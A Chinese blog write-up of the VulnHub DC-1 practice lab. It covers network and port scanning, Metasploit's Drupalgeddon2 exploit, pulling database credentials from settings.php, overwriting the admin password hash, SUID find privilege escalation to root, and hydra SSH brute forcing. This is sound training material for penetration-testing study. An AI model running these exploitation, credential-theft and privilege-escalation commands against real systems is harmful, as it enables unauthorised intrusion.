vulnhub练习 DC-1复现及分析

这篇具有很好参考价值的文章主要介绍了vulnhub练习 DC-1复现及分析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、搭建环境

1.工具

靶机:DC-1 192.168.200.17

攻击机:kali 192.168.200.13

2.注意

攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式)

DC-1网络设计

点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

KALI网络设计

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

二、信息收集

根据题意,需要得知靶机DC-1的IP地址、IP地址开放的端口及网站的指纹信息

1.扫描靶机IP地址

收集在某网段上存活的主机方式有很多种,常见的、易记忆的有arp-scan、nmap、netdiscover

arp-scan:arp-scan -l

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

nmap:nmap -sP 192.168.200.0/24 -T4	 

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

netdiscover:netdiscover  #较慢可加参数

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

2.扫描目标IP开放端口

nmap -sV -p- 192.168.200.17 
#-sV  扫描目标主机端口上运行的软件信息
#-p-  扫描全部端口0-65535

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

尝试访问http80端口,一般可以直接访问

3.获取指纹信息

利用插件wappalyzer可以知道网站的指纹信息

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全
亦可以利用kali中的自带工具whatqweb工具

whatweb -v 192.168.200.17

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

从以上便两种方式都可以看出网站的cms是Drupal 7

世界上有名的CMS 其中就包括Drupal
还有wordpress、 joomla等等

附:然后就可以百度或者谷歌探测此cms包含的漏洞浮现文章,当然亦可以根据扫描出的其他信息寻找浮现文章学习。

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

另外,经过测试22端口和111端口都是无法进行访问,网站是做了某些限制的。

4.目录扫描

部分结果

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

三、漏洞利用

Metasploit利用

先打开kali

msfconsole

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

查询模块

search drupal

利用2018年的这个漏洞(远程代码执行)

漏洞编号:CVE-2018-7600

Drupal 6,7,8等多个子版本存在远程代码执行漏洞

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

use exploit/unix/webapp/drupal_drupalgeddon2

查看漏洞参数

show options

Current Setting是需要设置的内容

Required表示设置的要求,yes为必须,no可以设置也可不设置

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

那就在RHOST位置设置IP地址(靶机的IP地址)

set RHOSTS 192.168.200.17

再次查询

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

利用参数exploit开始攻击

exploit

看到如下参数,则说明攻击机kali和靶机DC-1建立连接

Meterpreter session 1 opened (192.168.200.14:4444 -> 192.168.200.17:56719) at 2023-07-18 23:10:24 -0400

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

获取shell

shell

当前路径

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

执行ls查看当前路径下的文件,可以看到flag1出现

flag1

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

反弹shell

要求攻击机上需要装python环境

python -c 'import pty; pty.spawn("/bin/bash")'

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

之句话意思是:每个好的CMS都需要一个配置文件,你也一样 说明需要找到配置文件

此CMS的配置文件名叫做settings.php

查询他所在的位置即可

cat sites/default/settings.php

flag2

告知数据库的类型是:mysql

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

另外也可以使用:模糊查找的方式

cat `find / -name settings.php`

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

英文的意思大概是:

暴力破解和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。您可以使用这些凭据做什么?

大概意思是提权了

连接数据库

用给出的密码和数据名尝试连接数据库爆破

mysql -udbuser -pR0ck3t

连接成功!

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

查询数据库

show databases;

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

利用数据库

use drupaldb;

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

查询数据表

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

查询users表信息

select * from users;

获取账户和密码

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

两个账户信息

密码不是明文,不知道是什么类型

admin S S SDvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

Fred S S SDWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

解决方法:

看到两个用户的密码被加密了,但可以修改密码或新增一个admin权限的用户

方法一:修改admin密码

使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户

先找到机密文件,加密脚本位置在/var/www/scripts/password-hash.sh下

/var/www/scripts/password-hash.sh

先退出mysql的命令行,打开加密脚本,可以看到此加密脚本使用php编写的

cat /var/www/scripts/password-hash.sh

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

用dupal自带脚本生成admin的密码为admin

php /var/www/scripts/password-hash.sh admin
username: admin    hash: $S$Dhk7CjZDCy.ZjoGxxBWmfuzwUiGVZZAqOvNz4Ah0w72GQV5tLj5i

用上图重新users表

update users set pass = "$S$Dhk7CjZDCy.ZjoGxxBWmfuzwUiGVZZAqOvNz4Ah0w72GQV5tLj5i" where name = 'admin' ;
username:admin      hash:$S$Dhk7CjZDCy.ZjoGxxBWmfuzwUiGVZZAqOvNz4Ah0w72GQV5tLj5i

方法二:添加admin权限用户

drupal 7(7.0~7.31)有SQL注入的漏洞(Drupal SQL注入漏洞(CVE-2014-3704)复现),可以添加一个admin权限的用户,然后再在msf找一下这个工具

searchsploit drupal

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

查看脚本文件

searchsploit 34992.py -p

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

登录账户admin,发现第flag3

flag3

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

主要在这两个单词:passwd和shadow,linux下的文件

/etc/passwd

/etc/shadow

cat /etc/passwd

有flag4这个用户,两个方法拿到这个用户的密码,一个是弱口令爆破,另一个提权打开shadow文件查看密码

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

而另一个是权限不够,当前用户是www-data需要root权限

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

切换目录带到目标文件下flag4.txt,看内容

flag4

第一种方式:

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

提权至root权限,找最后的flag了,使用find命令查找有特殊权限suid的命令:find / -perm -4000

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

发现flag4,并且flag4是一个用户,flag4用户密码可以使用ssh登录进行爆破

再使用find 命令进行提权:find ./misc -exec “/bin/sh” ;获取root 权限,

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

第二种方式

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz   #下载John密码包
tar -xvf john-1.8.0.tar.gz  #解压缩
cd john-1.8.0/ src    #进入源码目录下
uname -a  #查看当前系统版本
make linux-x86-64   #编译并指定当前的Linux系统版本

使用hydra+John密码包对flag4的密码进行爆破,爆破密码为:flag4/orange

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

flag4用户使用ssh登录

ssh flag4@192.168.200.17

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

此时发现是flag4用户,而不是root,用上边同样的方法,find命令提权为root。

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

thefinalflag.txt

在root目录下发现最后的flag

vulnhub练习 DC-1复现及分析,vulnhub,靶机渗透,渗透测试,web安全

五、总结

1.扫描局域网主机

arp-scan -l

netdiscover用法

map -sP x.x.x.x

2.开放端口扫描

nmap -sV -p- x.x.x.x

2.MSF使用

3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100

hydra+John密码包

以上两种方式可以爆出flag4的密码

4.suid提权:Linux下用SUID提权、find命令exec文章来源地址https://www.toymoban.com/news/detail-832803.html

到了这里,关于vulnhub练习 DC-1复现及分析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

    信息收集就略了,nmap就可以了,没有太多知识 你会收集到 1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到 2.http://靶场ip/se3reTdir777/index.php# 这是一个sql注入页面 先测试有无SQL注入漏洞,输入SQL注入测试神技  \\\' 进行测试 提示我们存在SQL语句错误,表

    2024年01月21日
    浏览(46)
  • 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个漏洞靶机,老样子需要找到flag即可。 官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    浏览(49)
  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(121)
  • Neos的渗透测试靶机练习——DarkHole-2

    1. 搜集信息 输入 sudo su ,将kali切换到 root权限 ; 输入 ifconfig 查询自身ip,即 攻击机ip ; 可以看到 自身ip 为 192.168.56.101 。 输入 arp-scan -l 扫描本网段存活主机,即 靶机ip地址 。 可以看到 靶机ip 为 192.168.56.105 ,。 输入 nmap -sV -p- 192.168.56.105 扫描靶机 所有端口开放情况 。

    2024年01月23日
    浏览(52)
  • VulnHub Jangow:1.0.1 渗透测试练习详解

    本文详细记录了对VulnHub Jangow:1.0.1的渗透测试过程,包括信息收集、FTP登录、后门连接、反弹shell、切换用户、提升权限等步骤,适合渗透测试练习和学习。

    2024年01月18日
    浏览(87)
  • 渗透测试vulnhub——Web-2.0

    目录 1、信息收集 2、漏洞利用  3、John爆破 4、命令执行漏洞 5、lxd提权  知识点: 下载地址:AI: Web: 2 ~ VulnHub 1、信息收集 使用 arp-scan -l 查看靶机ip    靶机:192.168.29.133  进行服务扫描: -sV -A -p- -O     开启了   22tcp  80http  系统:linux -sv 服务信息、-A详细信息、-p- 所有端

    2024年01月17日
    浏览(45)
  • VulnHub靶机渗透:SKYTOWER: 1

    https://www.vulnhub.com/entry/skytower-1,96/ 靶机IP:192.168.56.101 kali IP:192.168.56.102 发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。 日常,先目录爆破 在目录爆破的过程中查看网页内容。 发现登录框,尝试万能密码。(这里用户和密码一样) 报错了,错误信息为 从这

    2024年02月10日
    浏览(86)
  • DC-1靶机渗透(教程以及思路)

    一:信息搜集 首先第一步就是使用fping来查看靶机的ip 使用命令fping -aqg ip 使用nmap -sS -p-进行扫描 发现开启了4个端口,分别是22,80,111,45186 再使用nmap的-sV扫描详细信息进行扫描,查看版本号判断是否存在漏洞 二:思路 一般来说这样的端口,我会先从80端口开始,看是否存

    2023年04月08日
    浏览(41)
  • vulnhub DC:3.2渗透笔记

    kali ip :192.168.20.130 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 信息收集 扫描靶机ip以及开放端口 开放了80端口访问一下 意思就是需要root权限了 查看Wapplayzer信息如下 使用的Joomla的CMS,使用joomscan(Joomla漏洞扫描器)扫描器扫描 后台登录界面已发现 漏洞攻击 使用searchsploit搜索

    2023年04月24日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包